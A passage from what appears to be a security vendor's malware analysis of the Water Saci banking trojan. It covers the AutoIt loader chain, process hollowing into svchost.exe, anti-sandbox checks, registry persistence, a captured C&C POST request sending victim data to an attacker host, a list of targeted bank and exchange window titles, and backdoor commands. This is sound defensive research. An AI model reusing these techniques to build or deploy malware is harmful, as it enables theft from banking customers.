class=\"rte-circle-bullet\">Bitstamp<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Bybit<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Coinbase<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Crypto.com<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Gate.io<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Huobi<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Kraken<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">KuCoin<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">OKX<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\"><b>Brazilian exchanges:<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Bitcoin Trade<\/span><\/li>\n<li><span 
class=\"rte-circle-bullet\">BitPreco<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Braziliex<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">FlowBTC<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Foxbit<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Mercado Bitcoin<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">NovaDAX<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\"><b>Cryptocurrency wallets:<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Atomic Wallet<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Blockchain.com<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Coinomi<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Electrum<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Exodus<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Jaxx<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Ledger Live<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">MetaMask<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">MyCrypto<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">MyEtherWallet<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Phantom<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Solflare<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">TokenPocket<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Trezor<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Trust Wallet<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>The payload decryption is triggered by detecting banking or cryptocurrency-related windows on the victim&#8217;s computer (Figure 13). If any of these windows contain keywords related to targeted entities, it proceeds on locating the .tda file (<i>ucJDpQ.tda<\/i>) dropped earlier as part of the MSI installer. 
If no .tda file is found, it looks for the .dmp file (<i>fKmkzW.dmp<\/i>) instead.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci13.png\" alt=\"Figure 13. Locating, decrypting, and decompressing the payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 13. Locating, decrypting, and decompressing the payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"39.5\">\n<div readability=\"24\">\n<p>Once located, the encrypted payload (either the .tda or .dmp file) is read as binary data and passed through a two-stage decryption and decompression process before it is loaded into memory:<\/p>\n<ol>\n<li>The payload is decrypted using a custom RC4-like stream cipher with hardcoded parameters (seed=1000, multiplier=3333, increment=3434), which yields the compressed executable hidden inside.<\/li>\n<li>The decrypted data is then decompressed using Windows&#8217; native LZNT1 algorithm through the RtlDecompressFragment API, expanding it back into a full PE executable.<\/li>\n<\/ol>\n<p>If a .tda file is present, the AutoIt script decrypts and loads it into memory as an intermediate PE loader (Stage 2). 
However, if only a .dmp file is found (no .tda present), the AutoIt script bypasses the intermediate loader entirely and loads the banking trojan directly into the AutoIt process memory, skipping the process-hollowing step and running as a simpler two-stage infection.<\/p>\n<p><b>Banking trojan &#8211; Second stage<\/b><\/p>\n<p>This loader then searches for additional .dmp or .tda files containing the final banking trojan, and decrypts and decompresses the payload using the same routine (Figure 14).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci14.png\" alt=\"Figure 14. Locating the final .dmp or .tda payload file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 14. Locating the final .dmp or .tda payload file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The loader injects the decrypted payload into a hollowed svchost.exe process to blend in with legitimate Windows system processes (Figure 15). It also includes an alternate fallback base address in case virtual memory allocation fails, ensuring the injection can still proceed (Figures 16 and 17).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci15.png\" alt=\"Figure 15. Creating a suspended process and allocating memory\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 15. Creating a suspended process and allocating memory<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci16.png\" alt=\"Figure 16. 
Alternate fallback base addresses\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 16. Alternate fallback base addresses<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci17.png\" alt=\"Figure 17. Resuming a hollowed process after setting thread context and writing the malicious payload into memory\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 17. Resuming a hollowed process after setting thread context and writing the malicious payload into memory<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p><b>Banking trojan &#8211; Persistence<\/b><\/p>\n<p>After the script runs the payload\u2019s entry point, the AutoIt script waits exactly two seconds to give the payload time to complete the process-hollowing routine inside svchost.exe (Figure 18).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci18.png\" alt=\"Figure 18. Loading the decrypted payload into memory and capturing the PID\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 18. 
Loading the decrypted payload into memory and capturing the PID<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The script then lists all running svchost.exe processes (Figure 19), retrieves their creation timestamps, and identifies the most recent instance, which is assumed to be the malicious process where the payload has performed process hollowing.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci19.png\" alt=\"Figure 19. Monitoring the most recent svchost.exe process\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 19. Monitoring the most recent svchost.exe process<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>The script stores the PID of that svchost.exe process and enters a continuous monitoring loop to regularly check whether this specific svchost.exe process is still running. If the process-hollowed svchost.exe is terminated, the malware resets its state, clears the stored PID, and waits to re-inject the payload the next time the victim opens a banking window, ensuring persistent access to the victim&#8217;s banking sessions.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"39.846774193548\">\n<div readability=\"25.58064516129\">\n<p><b>Banking trojan<\/b><\/p>\n<p>Several behaviors in this sample are similar to those observed in the <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/20\/b\/this-week-in-security-news-zdi-bug-hunters-rake-in-1-5m-in-2019-and-metamorfo-trojan-malware-campaign-targets-online-banking-users.html\" target=\"_blank\">Casbaneiro (Metamorfo)<\/a> banking malware lineage. 
Like earlier Metamorfo campaigns that relied on a launcher executable invoking AutoIt3 to run a compiled .A3X script alongside a DLL containing the main payload, this sample exhibits the same multi-stage AutoIt-based delivery pattern. This chain ultimately unpacks and activates the banking trojan payload \u2013 mirroring Metamorfo\u2019s signature reliance on AutoIt as a loader framework. Combined with the familiar window title monitoring, registry-based persistence, IMAP-based fallback C&amp;C mechanism, and the presence of token-like C&amp;C markers such as <i>&lt;||&gt;<\/i>, the sample reflects both structural and behavioral continuity with Casbaneiro\/Metamorfo.<\/p>\n<p><b><i>Anti-sandbox analysis<\/i><\/b><\/p>\n<p>Once executed, the payload begins with an aggressive set of anti-virtualization checks designed to evade analysis environments. The malware queries the registry path <i>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\<\/i>, looking specifically for the following VM-related services:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">VGAuthService<\/span><\/li>\n<li><span class=\"rte-red-bullet\">vm3dservice<\/span><\/li>\n<li><span class=\"rte-red-bullet\">VMTools<\/span><\/li>\n<li><span class=\"rte-red-bullet\">vmvss<\/span><\/li>\n<\/ul>\n<p>It also enumerates active services to check for the same strings. If any match is found, the malware immediately triggers a custom exception (EEDFADE) via RaiseException, effectively terminating execution to avoid sandbox analysis (Figure 20).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci20.png\" alt=\"Figure 20. Exception triggered that is used for anti-sandbox analysis\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 20. 
Exception triggered that is used for anti-sandbox analysis<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p><b><i>System Profiling via WMI<\/i><\/b><\/p>\n<p>If virtualization is not detected, the payload proceeds to gather host information through multiple WMI queries, including:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">AntiVirusProduct<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Win32_ComputerSystem<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Win32_OperatingSystem<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Win32_Processor<\/span><\/li>\n<\/ul>\n<p>The stolen information is later sent to the C&amp;C server as part of the initial check-in.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p><b><i>Registry modification and persistence<\/i><\/b><\/p>\n<p>The malware creates a unique application registry entry under <i>HKEY_CURRENT_USER\\Software\\MyUniqueApp<\/i>, setting <i>UniqueSerial<\/i> to a UUID-generated string. To maintain persistence, it adds itself to the AutoRun registry key at <i>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/i>, pointing the entry to its executable path. 
It also drops an additional marker under <i>HKEY_CURRENT_USER\\Software\\MeuApp<\/i> by setting <i>inicio = true<\/i>, indicating that the main routine should begin.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"11.5\">\n<p><b><i>C&amp;C check-in communication<\/i><\/b><\/p>\n<p>The payload then connects to its C&amp;C server at <i>hxxps:\/\/serverseistemasatu.com\/data.php?recebe<\/i> and sends a POST request containing system and user information:<\/p>\n<blockquote readability=\"6\"><p>POST \/data.php?recebe HTTP\/1.1<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>User-Agent: DelphiApp<br \/>Host: serverseistemasatu.com<br \/>Content-Length: 267<br \/>Cache-Control: no-cache<\/p>\n<p>nomeRegistro={User name}&amp;nomeComputador={Computer<br \/>name}&amp;nomeSistema={Operating<br \/>System}&amp;processador={Processor}&amp;antivirus={Antivirus<br \/>product}&amp;ultimaAtualizacao={Date}<\/p>\n<\/blockquote><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p><b><i>Targeted banking window detection<\/i><\/b><\/p>\n<p>The malware includes a timer-based routine (<i>TForm1_Timer4Timer<\/i>) that continuously scans the titles of active windows to identify whether the user is interacting with banking or cryptocurrency platforms. 
When a match is found, the malware classifies the detected application based on predefined window title substrings commonly associated with major financial institutions and exchanges (Table 4).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\"> <center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"20\">\n<tr>\n<td valign=\"top\"><b>Category<\/b><\/td>\n<td width=\"0\" valign=\"top\"><b>Window title\/substring<\/b><\/td>\n<td valign=\"top\"><b>Detected as<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"><b>Santander<\/b><\/td>\n<td width=\"0\" valign=\"top\">Santander &#8211; Ofertas para Empresas<\/td>\n<td valign=\"top\">Santander<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Internet banking empresarial &#8211; Santander<\/td>\n<td valign=\"top\">Santander<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Santander &#8211;<\/td>\n<td valign=\"top\">Santander<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Banco do Brasil<\/b><\/td>\n<td width=\"0\" valign=\"top\">Banco do Brasil &#8211;<\/td>\n<td valign=\"top\">Banco do Brasil<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Banco do Brasil e mais<\/td>\n<td valign=\"top\">Banco do Brasil<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Autoatendimento Banco do Brasil<\/td>\n<td valign=\"top\">Banco do Brasil<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Banrisul<\/b><\/td>\n<td width=\"0\" valign=\"top\">Banrisul Home Banking<\/td>\n<td valign=\"top\">Banrisul<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Portal Internet Banrisul Home Banking<\/td>\n<td valign=\"top\">Banrisul<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Banrisul Office 
Banking<\/td>\n<td valign=\"top\">Banrisul<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\"><b>Tribanco<\/b><\/td>\n<td width=\"0\" valign=\"top\">Tribanco \u00bb Para sua Empresa<\/td>\n<td valign=\"top\">Tribanco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Tribanco \u00bb Para Voc\u00ea<\/td>\n<td valign=\"top\">Tribanco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Bradesco<\/b><\/td>\n<td width=\"0\" valign=\"top\">Banco Bradesco<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Bradesco Net Empresa Bradesco &#8211;<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Bradesco Net Empresa Bradesco<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Bradesco Prime &#8211;<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Bradesco Prime e<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Internet Banking Bradesco:<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Internet Banking Bradesco: Saldos, extratos, Pix e muito mais!<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Bradesco Exclusive Digital Mais facilidade e autonomia &#8211;<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Bradesco Exclusive Digital Mais facilidade e autonomia<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Bradesco 
Para Voc\u00ea<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Bradesco Prime Digital Bradesco Prime<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Bradesco Global Private Bank Assessoria de Investimentos Especializada<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">NavegadorExclusivoBradesco.exe<\/td>\n<td valign=\"top\">Bradesco<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Sicredi<\/b><\/td>\n<td width=\"0\" valign=\"top\">Sicredi<\/td>\n<td valign=\"top\">Sicredi<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Sicoob<\/b><\/td>\n<td width=\"0\" valign=\"top\">SicoobNet<\/td>\n<td valign=\"top\">Sicoob<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Sicoob &#8211;<\/td>\n<td valign=\"top\">Sicoob<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">sicoob.com.br &#8211; SicoobNet<\/td>\n<td valign=\"top\">Sicoob<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>BMG<\/b><\/td>\n<td width=\"0\" valign=\"top\">Bem-vindo ao seu BMG<\/td>\n<td valign=\"top\">BMG<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">BMG &#8211;<\/td>\n<td valign=\"top\">BMG<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>BTG Pactual<\/b><\/td>\n<td width=\"0\" valign=\"top\">app.btgpactual.com<\/td>\n<td valign=\"top\">BTG Pactual<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">BTG Pactual &#8211;<\/td>\n<td valign=\"top\">BTG Pactual<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">BTG Pactual Empresas<\/td>\n<td valign=\"top\">BTG Pactual<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>BS2<\/b><\/td>\n<td width=\"0\" 
valign=\"top\">app.empresas.bs2.com<\/td>\n<td valign=\"top\">BS2<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">BS2 &#8211;<\/td>\n<td valign=\"top\">BS2<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Empresas BS2<\/td>\n<td valign=\"top\">BS2<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Ita\u00fa<\/b><\/td>\n<td width=\"0\" valign=\"top\">Banco Ita\u00fa &#8211;<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa Personnalit\u00e9 I<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa Uniclass:<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa BBA &#8211;<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa BBA<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa BBA e<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Ita\u00fa Empresas<\/td>\n<td valign=\"top\">Ita\u00fa<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\"><b>Crypto\/Exchange<\/b><\/td>\n<td width=\"0\" valign=\"top\">Entrar Binance<\/td>\n<td valign=\"top\">Binance<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Iniciar sess\u00e3o Binance<\/td>\n<td valign=\"top\">Binance<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Entre no site da OKX OKX<\/td>\n<td valign=\"top\">OKX<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Crypto.com Log in<\/td>\n<td valign=\"top\">Crypto.com<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" 
valign=\"top\">Fa\u00e7a o login e acesse a sua conta do Mercado Bitcoin MB<\/td>\n<td valign=\"top\">Mercado Bitcoin<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Coinbase<\/td>\n<td valign=\"top\">CryptoBR<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Foxbit<\/td>\n<td valign=\"top\">CryptoBR<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Fa\u00e7a o login e acesse a sua conta do NovaDax NovaDax<\/td>\n<td valign=\"top\">NovaDax<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Fa\u00e7a login e opere Bitget<\/td>\n<td valign=\"top\">Bitget<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Login Bybit<\/td>\n<td valign=\"top\">Bybit<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">&#8211; default_wallet<\/td>\n<td valign=\"top\">CryptoBR<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td valign=\"top\">&nbsp;<\/td>\n<td width=\"0\" valign=\"top\">Login &#8211; Acesse sua conta Coinext<\/td>\n<td valign=\"top\">Coinext<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 4. predefined window title substrings commonly associated with major financial institutions and exchanges the malware classifies<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p><b><i>IMAP-based secondary C&amp;C discovery<\/i><\/b><\/p>\n<p>The payload uses the same IMAP-based technique previously documented in our recent analysis of the Water Saci campaign, where the malware logs into a terra.com.br mailbox using hardcoded credentials and retrieves an email titled \u201cmeu\u201d to extract an updated C&amp;C address from a line beginning with<i> IP: <\/i>(Figure 21). 
The key difference is that while the earlier instance appeared only in a recovered auxiliary script, this version incorporates the IMAP routine directly into the injected payload itself, indicating that the operators are reusing the same infrastructure and method but have now embedded it deeper into the malware\u2019s runtime to make C&amp;C updates more seamless and reliable.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci21.jpg\" alt=\"Figure 21. Function used for the IMAP-based C&amp;C retrieval technique\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 21. Function used for the IMAP-based C&amp;C retrieval technique<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37.5\">\n<div readability=\"20\">\n<p><b><i>Browser termination routine<\/i><\/b><\/p>\n<p>Before executing credential-related actions, the payload forcibly terminates several browser processes:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">chrome.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">firefox.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">msedge.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">NavegadorExclusivoBradesco.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Opera.exe<\/span><\/li>\n<\/ul>\n<p>This behavior is common in banking malware that intercepts sessions or forces victims to reopen banking sites under attacker-controlled conditions.<\/p>\n<p><b><i>Backdoor capabilities<\/i><\/b><\/p>\n<p>The injected payload also includes an extensive set of backdoor commands, granting the operator near-complete remote control over the infected system. 
Table 5 summarizes most of the commands along with their descriptions, providing insight into the full range of actions this banking trojan can execute on a victim\u2019s machine.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\"> <center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"25\">\n<tr>\n<td width=\"147\" valign=\"top\"><b>Category<\/b><\/td>\n<td width=\"213\" valign=\"top\"><b>Command<\/b><\/td>\n<td width=\"263\" valign=\"top\"><b>Description<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"147\" rowspan=\"4\" valign=\"top\">Connection Commands<\/td>\n<td width=\"213\" valign=\"top\">&lt;|SocketMain|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Main socket communication handler<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\">&lt;|OK |&gt;<\/td>\n<td width=\"263\" valign=\"top\">Send system information &lt;|Info|&gt; to C&amp;C server<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\">&lt;|PING|&gt; \/ &lt;|PONG|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Network connectivity test<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\">&lt;|Close|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Close all active connections<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"147\" valign=\"top\">Authentication and Security<\/td>\n<td width=\"213\" valign=\"top\">&lt;|NOSenha|&gt;<\/td>\n<td width=\"263\" valign=\"top\">&nbsp;Display password error message<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"147\" rowspan=\"5\" valign=\"top\">Remote Desktop and Screen Control<\/td>\n<td width=\"213\" valign=\"top\">&lt;|REQUESTKEYBOARD|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Enable keyboard capture<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\">&lt;|first|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Initialize screen sharing session<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" 
